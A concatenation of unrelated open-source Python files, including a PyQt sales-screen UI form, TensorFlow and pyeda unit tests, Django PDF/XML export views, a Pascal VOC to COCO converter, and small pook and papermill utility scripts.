"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_22.setObjectName("lb_FormVenda_22")
self.dt_FimVenda = QtWidgets.QDateEdit(self.fr_TopoMenuVendas)
self.dt_FimVenda.setGeometry(QtCore.QRect(460, 16, 140, 20))
self.dt_FimVenda.setStyleSheet("QDateEdit {\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 20px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QDateEdit::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 25px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QDateEdit::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }")
self.dt_FimVenda.setCalendarPopup(True)
self.dt_FimVenda.setObjectName("dt_FimVenda")
self.lb_FormVenda_29 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_29.setGeometry(QtCore.QRect(610, 2, 95, 16))
self.lb_FormVenda_29.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_29.setObjectName("lb_FormVenda_29")
self.cb_pagamento = QtWidgets.QComboBox(self.fr_TopoMenuVendas)
self.cb_pagamento.setGeometry(QtCore.QRect(610, 16, 95, 20))
self.cb_pagamento.setStyleSheet("QComboBox{\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 11px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 18px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QComboBox::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }\n"
"")
self.cb_pagamento.setObjectName("cb_pagamento")
self.lb_FormVenda_30 = QtWidgets.QLabel(self.fr_TopoMenuVendas)
self.lb_FormVenda_30.setGeometry(QtCore.QRect(715, 0, 95, 16))
self.lb_FormVenda_30.setStyleSheet("QLabel{\n"
"font-size: 12px;\n"
"font-family: \"Arial Unicode MS\";\n"
"\n"
"color:#1E87F0;\n"
"border: none;\n"
"}")
self.lb_FormVenda_30.setObjectName("lb_FormVenda_30")
self.cb_entrega = QtWidgets.QComboBox(self.fr_TopoMenuVendas)
self.cb_entrega.setGeometry(QtCore.QRect(715, 14, 95, 20))
self.cb_entrega.setStyleSheet("QComboBox{\n"
"background: #E1DFE0;\n"
"border: none;\n"
"font-family: \"Arial\";\n"
"font-size: 11px;\n"
"font-weight: bold;\n"
"color: rgb(80,79,79)\n"
"}\n"
" QComboBox::drop-down {\n"
" subcontrol-origin: padding;\n"
" subcontrol-position: top right;\n"
" width: 18px;\n"
" border-left-width: 1px;\n"
" border-left-color: darkgray;\n"
" border-left-style: solid; /* just a single line */\n"
" border-top-right-radius: 3px; /* same radius as the QComboBox */\n"
" border-bottom-right-radius: 3px;\n"
" }\n"
"QComboBox::down-arrow {\n"
" image: url(:Images/Images/down.png);\n"
" }\n"
"")
self.cb_entrega.setObjectName("cb_entrega")
self.ct_containerVendas = QtWidgets.QFrame(self.frameMainVendas)
self.ct_containerVendas.setGeometry(QtCore.QRect(0, 100, 1000, 500))
self.ct_containerVendas.setStyleSheet("border: none")
self.ct_containerVendas.setObjectName("ct_containerVendas")
self.tb_Vendas = QtWidgets.QTableWidget(self.ct_containerVendas)
self.tb_Vendas.setGeometry(QtCore.QRect(0, 0, 1000, 500))
self.tb_Vendas.setProperty("cursor", QtCore.Qt.PointingHandCursor)
self.tb_Vendas.setFocusPolicy(QtCore.Qt.WheelFocus)
self.tb_Vendas.setStyleSheet("QTableView{\n"
"color: #797979;\n"
"font-weight: bold;\n"
"font-size: 13px;\n"
"background: #FFF;\n"
"padding: 0 0 0 5px;\n"
"}\n"
"QHeaderView:section{\n"
"background: #FFF;\n"
"padding: 5px 0 ;\n"
"font-size: 13px;\n"
"font-family: \"Arial\";\n"
"font-weight: bold;\n"
"color: #797979;\n"
"border: none;\n"
"border-bottom: 2px solid #CCC;\n"
"}\n"
"QTableView::item {\n"
"border-bottom: 2px solid #CCC;\n"
"padding: 2px;\n"
"}\n"
"\n"
"")
self.tb_Vendas.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tb_Vendas.setFrameShadow(QtWidgets.QFrame.Plain)
self.tb_Vendas.setAutoScrollMargin(20)
self.tb_Vendas.setEditTriggers(
QtWidgets.QAbstractItemView.NoEditTriggers)
self.tb_Vendas.setTabKeyNavigation(False)
self.tb_Vendas.setProperty("showDropIndicator", False)
self.tb_Vendas.setDragDropOverwriteMode(False)
self.tb_Vendas.setSelectionMode(
QtWidgets.QAbstractItemView.NoSelection)
self.tb_Vendas.setSelectionBehavior(
QtWidgets.QAbstractItemView.SelectRows)
self.tb_Vendas.setTextElideMode(QtCore.Qt.ElideMiddle)
self.tb_Vendas.setShowGrid(False)
self.tb_Vendas.setCornerButtonEnabled(False)
self.tb_Vendas.setRowCount(0)
self.tb_Vendas.setObjectName("tb_Vendas")
self.tb_Vendas.setColumnCount(7)
self.tb_Vendas.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.tb_Vendas.setHorizontalHeaderItem(6, item)
self.tb_Vendas.horizontalHeader().setDefaultSectionSize(120)
self.tb_Vendas.horizontalHeader().setStretchLastSection(True)
self.tb_Vendas.verticalHeader().setVisible(False)
self.tb_Vendas.verticalHeader().setCascadingSectionResizes(True)
self.tb_Vendas.verticalHeader().setDefaultSectionSize(50)
self.fr_TituloVendas = QtWidgets.QFrame(self.frameMainVendas)
self.fr_TituloVendas.setGeometry(QtCore.QRect(0, 0, 1000, 60))
self.fr_TituloVendas.setStyleSheet("border: none")
self.fr_TituloVendas.setObjectName("fr_TituloVendas")
self.lb_tituloVendas = QtWidgets.QLabel(self.fr_TituloVendas)
self.lb_tituloVendas.setGeometry(QtCore.QRect(10, 15, 200, 30))
font = QtGui.QFont()
font.setFamily("DejaVu Sans")
font.setPointSize(18)
font.setWeight(75)
font.setBold(True)
self.lb_tituloVendas.setFont(font)
self.lb_tituloVendas.setStyleSheet("color: #FFF")
self.lb_tituloVendas.setObjectName("lb_tituloVendas")
self.tradMainVendas(ct_MainVendas)
QtCore.QMetaObject.connectSlotsByName(ct_MainVendas)
def tradMainVendas(self, ct_MainVendas):
ct_MainVendas.setWindowTitle(QtWidgets.QApplication.translate(
"ct_MainVendas", "Frame", None, -1))
self.bt_BuscaVendas.setToolTip(
QtWidgets.QApplication.translate("ct_MainVendas", "BUSCAR", None, -1))
self.tx_BuscaVendas.setPlaceholderText(QtWidgets.QApplication.translate(
"ct_MainVendas", "PROCURAR POR...", None, -1))
self.bt_PrintRelatVendas.setToolTip(
QtWidgets.QApplication.translate("ct_MainVendas", "IMPRIMIR", None, -1))
self.dt_InicioVenda.setDisplayFormat(
QtWidgets.QApplication.translate("ct_MainVendas", "dd/MM/yyyy", None, -1))
self.lb_FormVenda_21.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "DATA ÍNICIO", None, -1))
self.lb_FormVenda_22.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "DATA FIM", None, -1))
self.dt_FimVenda.setDisplayFormat(QtWidgets.QApplication.translate(
"ct_MainVendas", "dd/MM/yyyy", None, -1))
self.lb_FormVenda_29.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "PAGAMENTO", None, -1))
self.lb_FormVenda_30.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "ENTREGA", None, -1))
self.tb_Vendas.horizontalHeaderItem(0).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "ID", None, -1))
self.tb_Vendas.horizontalHeaderItem(2).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "CLIENTE", None, -1))
self.tb_Vendas.horizontalHeaderItem(3).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "EMISSÂO", None, -1))
self.tb_Vendas.horizontalHeaderItem(4).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "ENTREGA", None, -1))
self.tb_Vendas.horizontalHeaderItem(5).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "VALOR", None, -1))
self.tb_Vendas.horizontalHeaderItem(6).setText(
QtWidgets.QApplication.translate("ct_MainVendas", "EDITAR", None, -1))
self.lb_tituloVendas.setText(QtWidgets.QApplication.translate(
"ct_MainVendas", "VENDAS", None, -1))
|
atlas/foundations_core_cli/src/test/__init__.py | DeepLearnI/atlas | 296 | 12669862 | <reponame>DeepLearnI/atlas<filename>atlas/foundations_core_cli/src/test/__init__.py
import faker
from test.test_project import TestProject
from test.test_scaffold import TestScaffold
from test.test_command_line_interface import TestCommandLineInterface
from test.test_environment_fetcher import TestEnvironmentFetcher
from test.test_config_listing import TestConfigListing
from test.job_submission import * |
resnet/models/multi_pass_optimizer_tests.py | renmengye/rev-resnet-public | 357 | 12669883 | <filename>resnet/models/multi_pass_optimizer_tests.py
"""Unit tests for multi-tower model."""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import numpy as np
import tensorflow as tf
from resnet.configs import get_config
from resnet.configs import test_configs
from resnet.models import get_model, get_multi_gpu_model
from resnet.models.multi_pass_optimizer import MultiPassOptimizer
from resnet.utils import logger
from resnet.utils.test_utils import check_two_dict
log = logger.get()
class MultiPassOptimizerTests(tf.test.TestCase):
def test_basic(self):
"""Tests multi pass optimizer basic behaviour."""
for aggregate_method in ["cumsum", "storage"]:
with tf.Graph().as_default(), tf.Session() as sess, log.verbose_level(2):
opt = tf.train.GradientDescentOptimizer(0.1)
mp_opt = MultiPassOptimizer(opt, 2, aggregate_method=aggregate_method)
a = tf.get_variable(
"a", shape=[10, 12], initializer=tf.constant_initializer(0.0))
b = tf.get_variable(
"b", shape=[11, 13], initializer=tf.constant_initializer(0.0))
da1 = tf.ones([10, 12]) * 0.4
da2 = tf.ones([10, 12]) * 0.6
db1 = tf.ones([11, 13]) * 0.8
db2 = tf.ones([11, 13]) * 1.0
gv1 = [(da1, a), (db1, b)]
gv2 = [(da2, a), (db2, b)]
op1 = mp_opt.apply_gradients(gv1)
op2 = mp_opt.apply_gradients(gv2)
sess.run(tf.global_variables_initializer())
sess.run([op1])
sess.run([op2])
a, b = sess.run([a, b])
# Final value equals -learning_rate * average_gradients.
np.testing.assert_allclose(a, -np.ones([10, 12]) * 0.05)
np.testing.assert_allclose(b, -np.ones([11, 13]) * 0.09)
if __name__ == "__main__":
tf.test.main()
|
examples/wav2vec/unsupervised/data/__init__.py | Shiguang-Guo/fairseq | 16,259 | 12669901 | <reponame>Shiguang-Guo/fairseq
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from .extracted_features_dataset import ExtractedFeaturesDataset
from .random_input_dataset import RandomInputDataset
__all__ = [
"ExtractedFeaturesDataset",
"RandomInputDataset",
]
|
pyeda/boolalg/test/test_bfarray.py | ivotimev/pyeda | 196 | 12669907 | <reponame>ivotimev/pyeda<filename>pyeda/boolalg/test/test_bfarray.py
"""
Test Boolean Function arrays
"""
from nose.tools import assert_raises
from pyeda.boolalg.bdd import bddvar, BinaryDecisionDiagram
from pyeda.boolalg.bfarray import (
exprzeros, exprvars,
fcat, farray,
uint2exprs, int2exprs,
)
from pyeda.boolalg.expr import exprvar, Expression
X = exprvars('x', 4)
Y = exprvars('y', 4)
a, b, c, d, w, x, y, z = map(exprvar, 'abcdwxyz')
def test_fcat():
# expected Function or farray
assert_raises(TypeError, fcat, X, Y, 0)
assert str(fcat(X[0], X[2:], Y[3], Y[:-2])) == "farray([x[0], x[2], x[3], y[3], y[0], y[1]])"
def test_farray():
# expected shape volume to match items
assert_raises(ValueError, farray, [X[0], X[1]], shape=((0, 42), ))
# could not determine ftype parameter
assert_raises(ValueError, farray, [])
# expected ftype to be a type
assert_raises(TypeError, farray, [X[0], X[1]], ftype=42)
# expected ftype to match items
assert_raises(ValueError, farray, [X[0], X[1]], ftype=BinaryDecisionDiagram)
# expected ftype to be a property subclass of Function
assert_raises(TypeError, farray, [], ftype=int)
# expected a sequence of Function
assert_raises(TypeError, farray, 42)
assert_raises(TypeError, farray, [1, 2, 3, 4])
# expected uniform dimensions
assert_raises(ValueError, farray, [[a, b], [w, x, y, z], 42])
assert_raises(ValueError, farray, [[a, b], [w, x, y, z]])
# expected uniform types
assert_raises(ValueError, farray, [[a, b], [c, bddvar('d')]])
assert_raises(ValueError, farray, [[a, b], [bddvar('c'), bddvar('d')]])
# _check_shape errors
assert_raises(ValueError, farray, [a, b, c, d], shape=((-1, 3), ))
assert_raises(ValueError, farray, [a, b, c, d], shape=((3, -1), ))
assert_raises(ValueError, farray, [a, b, c, d], shape=((5, 1), ))
assert_raises(TypeError, farray, [a, b, c, d], shape=(('foo', 'bar'), ))
assert_raises(TypeError, farray, [a, b, c, d], shape=42)
temp = farray([[a, b], [c, d]])
assert str(temp) == """\
farray([[a, b],
[c, d]])\
"""
# __str__
Z = exprvars('z', 2, 2, 2)
assert str(Z) == """\
farray([[[z[0,0,0], z[0,0,1]],
[z[0,1,0], z[0,1,1]]],
[[z[1,0,0], z[1,0,1]],
[z[1,1,0], z[1,1,1]]]])\
"""
assert str(farray([], ftype=Expression)) == "farray([])"
# __getitem__
# expected <= M slice dimensions, got N
assert_raises(ValueError, X.__getitem__, (2, 2))
sel = exprvars('s', 2)
assert X[sel].equivalent(~sel[0] & ~sel[1] & X[0] | sel[0] & ~sel[1] & X[1] | ~sel[0] & sel[1] & X[2] | sel[0] & sel[1] & X[3])
assert X[:2][sel[0]].equivalent(~sel[0] & X[0] | sel[0] & X[1])
# expected clog2(N) bits
assert_raises(ValueError, X.__getitem__, sel[0])
# slice step not supported
assert_raises(ValueError, X.__getitem__, slice(None, None, 2))
# type error
assert_raises(TypeError, X.__getitem__, 'foo')
# norm_index
assert X[-1] is X[3]
assert_raises(IndexError, X.__getitem__, 42)
# norm_indices
assert X[-3:-1]._items == [X[-3], X[-2]]
assert not X[-8:-10]._items
assert not X[-10:-8]._items
assert not X[8:10]._items
assert not X[10:8]._items
assert not X[3:1]._items
# __setitem__
Z = exprzeros(4, 4)
Z[0,0] = X[0]
assert Z._items[0] is X[0]
# expected item to be a Function
assert_raises(TypeError, Z.__setitem__, (0, 0), 42)
Z[0,:] = X[:4]
assert Z._items[0:4] == [X[0], X[1], X[2], X[3]]
# expected item to be an farray
assert_raises(TypeError, Z.__setitem__, (0, slice(None, None, None)), 42)
# expected item.size = ...
assert_raises(ValueError, Z.__setitem__, ..., X[:2])
# slice step not supported
assert_raises(ValueError, X.__setitem__, slice(None, None, 2), 42)
# type error
assert_raises(TypeError, X.__setitem__, 'foo', 42)
# __add__
assert (0 + X)._items[0].is_zero()
assert (X + 0)._items[4].is_zero()
assert (Y[0] + X)._items[0] is Y[0]
assert (X + Y[0])._items[4] is Y[0]
assert (X[:2] + Y[2:])._items == [X[0], X[1], Y[2], Y[3]]
# expected Function or farray
assert_raises(TypeError, X.__add__, 42)
assert_raises(TypeError, X.__radd__, 42)
A = exprvars('a', 2, 5, 6)
B = exprvars('b', 2, 5, 6)
C = exprvars('c', (1, 3), 5, 6)
# regular MDA will retain shape
assert (A+B).shape == ((0, 4), (0, 5), (0, 6))
# irregular MDA will not
assert (A+C).shape == ((0, 4*5*6), )
# regular MDA will retain shape
assert (A*2).shape == ((0, 4), (0, 5), (0, 6))
# irregular MDA will not
assert (C*2).shape == ((0, 4*5*6), )
# __mul__
# expected multiplier to be an int
assert_raises(TypeError, X.__mul__, 'foo')
# expected multiplier to be non-negative
assert_raises(ValueError, X.__mul__, -2)
assert (X[:2] * 2)._items == [X[0], X[1], X[0], X[1]]
assert (2 * X[:2])._items == [X[0], X[1], X[0], X[1]]
# offsets
Z = exprzeros((1, 5), (17, 21))
assert Z.offsets == (1, 17)
# reshape
assert Z.reshape(4, 4).shape == ((0, 4), (0, 4))
# expected shape with equal volume
assert_raises(ValueError, Z.reshape, 42, 42)
# restrict
assert str(X.vrestrict({X: '0101'})) == "farray([0, 1, 0, 1])"
# compose
assert X.compose({X[0]: Y[0]})._items[0] == Y[0]
# to_uint / to_int
assert uint2exprs(42).to_uint() == 42
assert uint2exprs(42, 8).to_uint() == 42
# expected all functions to be a constant (0 or 1) form
assert_raises(ValueError, X.to_uint)
# expected num >= 0
assert_raises(ValueError, uint2exprs, -1)
# overflow
assert_raises(ValueError, uint2exprs, 42, 2)
assert_raises(ValueError, int2exprs, 42, 2)
assert int2exprs(-42).to_int() == -42
assert int2exprs(-42, 8).to_int() == -42
assert int2exprs(42).to_int() == 42
assert int2exprs(42, 8).to_int() == 42
# zext, sext
assert X.zext(1)[4].is_zero()
assert X.sext(1)[4] is X[3]
# __invert__, __or__, __and__, __xor__
assert str(~X) == "farray([~x[0], ~x[1], ~x[2], ~x[3]])"
assert str(X | Y) == "farray([Or(x[0], y[0]), Or(x[1], y[1]), Or(x[2], y[2]), Or(x[3], y[3])])"
assert str(X & Y) == "farray([And(x[0], y[0]), And(x[1], y[1]), And(x[2], y[2]), And(x[3], y[3])])"
assert str(X ^ Y) == "farray([Xor(x[0], y[0]), Xor(x[1], y[1]), Xor(x[2], y[2]), Xor(x[3], y[3])])"
# _op_shape
# expected farray input
assert_raises(TypeError, X.__or__, 42)
Z = exprvars('z', 2, 2)
assert str(X | Z) == "farray([Or(x[0], z[0,0]), Or(x[1], z[0,1]), Or(x[2], z[1,0]), Or(x[3], z[1,1])])"
Z = exprvars('z', 2, 3)
# expected operand sizes to match
assert_raises(ValueError, X.__or__, Z)
# lsh, rsh
assert str(X.lsh(0)) == "(farray([x[0], x[1], x[2], x[3]]), farray([]))"
assert str(X << 0) == "farray([x[0], x[1], x[2], x[3]])"
assert str(X.lsh(2)) == "(farray([0, 0, x[0], x[1]]), farray([x[2], x[3]]))"
assert str(X << 2) == "farray([0, 0, x[0], x[1]])"
assert str(X << (2, Y[:2])) == "farray([y[0], y[1], x[0], x[1]])"
assert str(X.rsh(0)) == "(farray([x[0], x[1], x[2], x[3]]), farray([]))"
assert str(X >> 0) == "farray([x[0], x[1], x[2], x[3]])"
assert str(X.rsh(2)) == "(farray([x[2], x[3], 0, 0]), farray([x[0], x[1]]))"
assert str(X >> 2) == "farray([x[2], x[3], 0, 0])"
assert str(X >> (2, Y[:2])) == "farray([x[2], x[3], y[0], y[1]])"
assert_raises(TypeError, X.__lshift__, 'foo')
assert_raises(ValueError, X.__lshift__, -1)
assert_raises(ValueError, X.__lshift__, (2, Y))
assert_raises(TypeError, X.__rshift__, 'foo')
assert_raises(ValueError, X.__rshift__, -1)
assert_raises(ValueError, X.__rshift__, (2, Y))
# arsh
assert str(X.arsh(0)) == "(farray([x[0], x[1], x[2], x[3]]), farray([]))"
assert str(X.arsh(2)) == "(farray([x[2], x[3], x[3], x[3]]), farray([x[0], x[1]]))"
assert_raises(ValueError, X.arsh, -1)
# unary ops
assert X.uor().equivalent(X[0] | X[1] | X[2] | X[3])
assert X.unor().equivalent(~(X[0] | X[1] | X[2] | X[3]))
assert X.uand().equivalent(X[0] & X[1] & X[2] & X[3])
assert X.unand().equivalent(~(X[0] & X[1] & X[2] & X[3]))
assert X.uxor().equivalent(X[0] ^ X[1] ^ X[2] ^ X[3])
assert X.uxnor().equivalent(~(X[0] ^ X[1] ^ X[2] ^ X[3]))
# decode
assert str(farray([], ftype=Expression).decode()) == "farray([1])"
parts = X[:2].decode()
assert parts[0].equivalent(~X[0] & ~X[1])
assert parts[1].equivalent(X[0] & ~X[1])
assert parts[2].equivalent(~X[0] & X[1])
assert parts[3].equivalent(X[0] & X[1])
def test_dims2shape():
assert_raises(ValueError, exprzeros)
assert_raises(ValueError, exprzeros, -1)
assert_raises(ValueError, exprzeros, (-1, 0))
assert_raises(ValueError, exprzeros, (0, -1))
assert_raises(ValueError, exprzeros, (1, 0))
assert_raises(TypeError, exprzeros, 'foo')
|
koalixcrm/accounting/views.py | Cataldir/koalixcrm | 290 | 12669911 | <reponame>Cataldir/koalixcrm
# -*- coding: utf-8 -*-
from os import path
from wsgiref.util import FileWrapper
from django.http import Http404
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from koalixcrm.crm.exceptions import *
from koalixcrm.djangoUserExtension.exceptions import *
from django.utils.translation import ugettext as _
def export_pdf(calling_model_admin, request, whereToCreateFrom, whatToCreate, redirectTo):
"""This method exports PDFs provided by different Models in the accounting application
Args:
calling_model_admin (ModelAdmin): The calling ModelAdmin must be provided for error message response.
request: The request User is required to get the Calling User TemplateSets and to know where to
save the error message whereToCreateFrom (Model): The model from which a PDF should be exported
whatToCreate (str): What document Type that has to be created
redirectTo (str): String that describes to where the method sould redirect in case of an error
Returns:
HTTpResponse with a PDF when successful
HTTpResponseRedirect when not successful
Raises:
Http404 exception if anything goes wrong"""
try:
pdf = whereToCreateFrom.createPDF(request.user, whatToCreate)
response = HttpResponse(FileWrapper(open(pdf, 'rb')), content_type='application/pdf')
response['Content-Length'] = path.getsize(pdf)
except (TemplateSetMissing, UserExtensionMissing) as e:
if e.isinstance(UserExtensionMissing):
response = HttpResponseRedirect(redirectTo)
calling_model_admin.message_user(request, _("User Extension Missing"))
elif e.isinstance(TemplateSetMissing):
response = HttpResponseRedirect(redirectTo)
calling_model_admin.message_user(request, _("Templateset Missing"))
else:
raise Http404
return response
def export_xml(callingModelAdmin, request, whereToCreateFrom, whatToCreate, redirectTo):
"""This method exports XMLs provided by different Models in the accounting application
Args:
callingModelAdmin (ModelAdmin): The calling ModelAdmin must be provided for error message response.
request: The request User is required to get the Calling User TemplateSets and to know where
to save the error message hereToCreateFrom (Model): The model from which a PDF should be exported
whatToCreate (str): What objects that have to be serialized
redirectTo (str): String that describes to where the method sould redirect in case of an error
Returns:
HTTpResponse with a PDF when successful
HTTpResponseRedirect when not successful
Raises:
raises Http404 exception if anything goes wrong"""
try:
xml = whereToCreateFrom.createXML(request.user, whatToCreate)
response = HttpResponse(FileWrapper(open(xml, 'rb')), mimetype='application/xml')
response['Content-Length'] = path.getsize(xml)
except (TemplateSetMissing, UserExtensionMissing) as e:
if e.isinstance(UserExtensionMissing):
response = HttpResponseRedirect(redirectTo)
callingModelAdmin.message_user(request, _("User Extension Missing"))
elif e.isinstance(TemplateSetMissing):
response = HttpResponseRedirect(redirectTo)
callingModelAdmin.message_user(request, _("Templateset Missing"))
else:
raise Http404
return response
|
tools/convert/voc2coco.py | Karybdis/mmdetection-mini | 834 | 12669996 | #!/usr/bin/python
# -*- coding:utf-8 -*-
import os
import os.path as osp
import json
import argparse
import xml.etree.ElementTree as ET
from mmdet import cv_core
START_BOUNDING_BOX_ID = 1
PRE_DEFINE_CATEGORIES = {}
def get(root, name):
vars = root.findall(name)
return vars
def get_and_check(root, name, length):
vars = root.findall(name)
if len(vars) == 0:
raise NotImplementedError('Can not find %s in %s.' % (name, root.tag))
if 0 < length != len(vars):
raise NotImplementedError('The size of %s is supposed to be %d, but is %d.' % (name, length, len(vars)))
if length == 1:
vars = vars[0]
return vars
def get_filename_as_int(filename):
try:
filename = os.path.splitext(filename)[0]
return int(filename)
except:
raise NotImplementedError('Filename %s is supposed to be an integer.' % (filename))
def _convert(xml_list, xml_dir, json_file):
if isinstance(xml_list, list):
list_fps = []
for xml in xml_list:
list_fps.append(open(xml, 'r'))
else:
list_fps = [open(xml_list, 'r')]
xml_dir = [xml_dir]
json_dict = {"images": [], "type": "instances", "annotations": [],
"categories": []}
categories = PRE_DEFINE_CATEGORIES
bnd_id = START_BOUNDING_BOX_ID
for i, lines in enumerate(list_fps):
for line in lines:
line = line.strip()
print("Processing %s" % (line + '.xml'))
xml_f = os.path.join(xml_dir[i], line + '.xml')
flag_name = xml_dir[i].split('/')[-2] + '/JPEGImages'
tree = ET.parse(xml_f)
root = tree.getroot()
path = get(root, 'path')
if len(path) == 1:
filename = os.path.basename(path[0].text)
elif len(path) == 0:
filename = get_and_check(root, 'filename', 1).text
else:
raise NotImplementedError('%d paths found in %s' % (len(path), line))
image_id = get_filename_as_int(filename)
size = get_and_check(root, 'size', 1)
width = int(get_and_check(size, 'width', 1).text)
height = int(get_and_check(size, 'height', 1).text)
image = {'file_name': os.path.join(flag_name, filename), 'height': height, 'width': width,
'id': image_id}
json_dict['images'].append(image)
for obj in get(root, 'object'):
category = get_and_check(obj, 'name', 1).text
if category not in categories:
new_id = len(categories)
categories[category] = new_id
category_id = categories[category]
bndbox = get_and_check(obj, 'bndbox', 1)
xmin = int(get_and_check(bndbox, 'xmin', 1).text) - 1
ymin = int(get_and_check(bndbox, 'ymin', 1).text) - 1
xmax = int(get_and_check(bndbox, 'xmax', 1).text)
ymax = int(get_and_check(bndbox, 'ymax', 1).text)
assert (xmax > xmin)
assert (ymax > ymin)
o_width = abs(xmax - xmin)
o_height = abs(ymax - ymin)
ann = {'area': o_width * o_height, 'iscrowd': 0, 'image_id':
image_id, 'bbox': [xmin, ymin, o_width, o_height],
'category_id': category_id, 'id': bnd_id, 'ignore': 0,
'segmentation': []}
json_dict['annotations'].append(ann)
bnd_id = bnd_id + 1
for cate, cid in categories.items():
cat = {'supercategory': 'none', 'id': cid, 'name': cate}
json_dict['categories'].append(cat)
json_fp = open(json_file, 'w')
json_str = json.dumps(json_dict)
json_fp.write(json_str)
json_fp.close()
for lines in list_fps:
lines.close()
def parse_args():
parser = argparse.ArgumentParser(
description='Convert PASCAL VOC annotations to coco format')
parser.add_argument('devkit_path', help='pascal voc devkit path') # voc根路径 里面存放的是VOC2007和VOC2012两个子文件夹
parser.add_argument('-o', '--out-dir', help='output path') # annotations 保存文件夹
args = parser.parse_args()
return args
def main():
args = parse_args()
devkit_path = args.devkit_path
out_dir = args.out_dir if args.out_dir else devkit_path
cv_core.mkdir_or_exist(out_dir)
year = None
years = []
if osp.isdir(osp.join(devkit_path, 'VOC2007')):
year = '2007'
years.append(year)
if osp.isdir(osp.join(devkit_path, 'VOC2012')):
year = '2012'
years.append(year)
if '2007' in years and '2012' in years:
year = ['2007', '2012']
if year == '2007':
prefix = 'voc07'
split = ['trainval', 'test'] # train集和test集
elif year == '2012':
prefix = 'voc12'
split = ['train', 'val'] # train集和test集
elif year == ['2007', '2012']:
prefix = 'voc0712'
split = [['trainval', 'train'], ['test', 'val']] # train集和test集
else:
raise NotImplementedError
for split_ in split:
if isinstance(split_, list):
dataset_name = prefix + '_' + split_[0]
else:
dataset_name = prefix + '_' + split_
print('processing {} ...'.format(dataset_name))
annotations_path = osp.join(out_dir, 'annotations')
cv_core.mkdir_or_exist(annotations_path)
out_file = osp.join(annotations_path, dataset_name + '.json')
if isinstance(split_, list):
filelists = []
xml_dirs = []
for i, s in enumerate(split_):
filelist = osp.join(devkit_path,
'VOC{}/ImageSets/Main/{}.txt'.format(year[i], s))
xml_dir = osp.join(devkit_path, 'VOC{}/Annotations'.format(year[i]))
filelists.append(filelist)
xml_dirs.append(xml_dir)
else:
filelists = osp.join(devkit_path, 'VOC{}/ImageSets/Main/{}.txt'.format(year, split_))
xml_dirs = osp.join(devkit_path, 'VOC{}/Annotations'.format(year))
_convert(filelists, xml_dirs, out_file)
print('Done!')
if __name__ == '__main__':
main()
|
examples/urllib3_chunked_response.py | Megarushing/pook | 304 | 12670055 | import pook
import urllib3
# Mock HTTP traffic only in the given context
with pook.use():
(pook.get('httpbin.org/chunky')
.reply(200)
.body(['returned', 'as', 'chunks'], chunked=True))
# Intercept request
http = urllib3.PoolManager()
r = http.request('GET', 'httpbin.org/chunky')
print('Chunks:', list(r.read_chunked()))
|
etc/run_notebooks.py | truongc2/data-describe | 294 | 12670079 | <filename>etc/run_notebooks.py
from pathlib import Path
import logging
import argparse
import json
import papermill as pm
def run_all_notebooks(args):
"""Run all notebooks in the example directory."""
for notebook in Path(__file__).parent.parent.glob("examples/*.ipynb"):
notebook_path = str(notebook.resolve())
if len(args.notebook_name) > 0:
if not any([x in notebook_path for x in args.notebook_name]):
logging.info(f"Skipping: {notebook_path}")
continue
nb = pm.execute_notebook(
notebook_path,
notebook_path,
request_save_on_cell_execute=True,
kernel_name="python3",
)
try:
nb["metadata"]["kernelspec"]["display_name"] = "Python 3"
nb["metadata"]["kernelspec"]["name"] = "python3"
except KeyError:
pass
with open(notebook, "w") as fp:
json.dump(nb, fp)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument("--notebook-name", action="append")
args, _ = parser.parse_known_args()
run_all_notebooks(args)
|
06. Chapter_6/pandas/sklearn_line_profiler.py | Mikma03/High-performance-Python | 223 | 12670087 | import timeit
import pandas as pd
import matplotlib.pyplot
from sklearn.linear_model import base
